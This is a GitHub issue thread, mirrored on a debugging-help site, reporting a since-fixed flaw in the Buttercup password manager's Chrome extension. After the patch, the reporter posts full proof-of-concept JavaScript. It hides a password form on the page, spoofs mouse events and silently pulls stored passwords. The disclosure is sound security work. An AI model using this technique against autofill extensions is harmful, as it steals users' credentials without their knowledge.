Stuck on an issue?

Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.

And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.

Security Vulnerabilty when browsing compromised sites

See original GitHub issue

With the Chrome extension installed, any web page can query the password store without the user’s permission.

I’ve written a getPassword function that works like so:

const password = await getPassword('github.com');
// 'mysecretpassword'

I know this is still beta but it’s had over 1K downloads on the Chrome Web Store so probably best not to post my source publicly. What’s the best way to contact you privately with more information?

Update: This has now been resolved. Full disclosure here: https://github.com/buttercup/buttercup-browser-extension/issues/92#issuecomment-372991430

Issue Analytics

State:
Created 6 years ago
Comments:14 (7 by maintainers)

Top GitHub Comments

4reactions

lukechildscommented, Mar 14, 2018

No problem, congrats on getting the fix out.

For anyone interested or looking how to prevent this kind of attack, the original message I sent in private explaining the exploit is below:

Ok, so this is my source code for the getPassword function:

const getPassword = query => new Promise(async resolve => {
  const waitForElem = selector => new Promise(resolve => {
    const interval = setInterval(() => {
      const elem = document.querySelector(selector);
      if(elem) {
        resolve(elem);
        clearInterval(interval);
      }
    }, 100);
  });

  const body = await waitForElem('body');
  const container = document.createElement('div');
  container.innerHTML = `
    <style>
      .buttercup-password-stealer,
      [data-buttercup-role="container"] {
        display: none;
      }
    </style>
    <form class="buttercup-password-stealer">
      <input name="password" type="password">
      <input type="submit">
    </form>
  `;
  body.appendChild(container);

  const password = await waitForElem('.buttercup-password-stealer [data-buttercup-input="password"]');
  password.dispatchEvent(new MouseEvent('mousemove', { clientX: 99999999 }));
  password.dispatchEvent(new MouseEvent('click'));

  container.querySelector('[type="submit"]').onclick = e => {
    e.preventDefault();
    resolve(password.value);
    container.remove();
  };

  const search = await waitForElem('[data-buttercup-role="container"] input');
  search.value = query;
  search.dispatchEvent(new CustomEvent('input'));

  const entry = await waitForElem('[data-buttercup-role="listbox"] div div');
  entry.click();
});

When the function is called it’ll inject a hidden password form into the DOM, wait for Buttercup to detect it, spoof some mouse events that will trigger the popup to open, search for the user supplied query in the Buttercup popup, listen for the form submit event and capture the password value, then clean everything up and remove the DOM elements. It requires no user interaction, doesn’t stop normal usage of Buttercup and doesn’t display anything visible on page or do anything to raise suspicion. It executes in a few hundred milliseconds and can run arbitrary search queries against the password store. e.g:

// Specific URL
const githubPassword = await getPassword('github.com');
// 'mysecretpassword'

// Fuzzy search
const cryptoExchangePassword = await getPassword('bitcoin');
// 'mysecretpassword'

1reaction

perry-mitchellcommented, Jan 17, 2018

Planning on releasing tomorrow… So hopefully this will end up in production soon. Firefox update may be slower due to historically poor review performance on their part.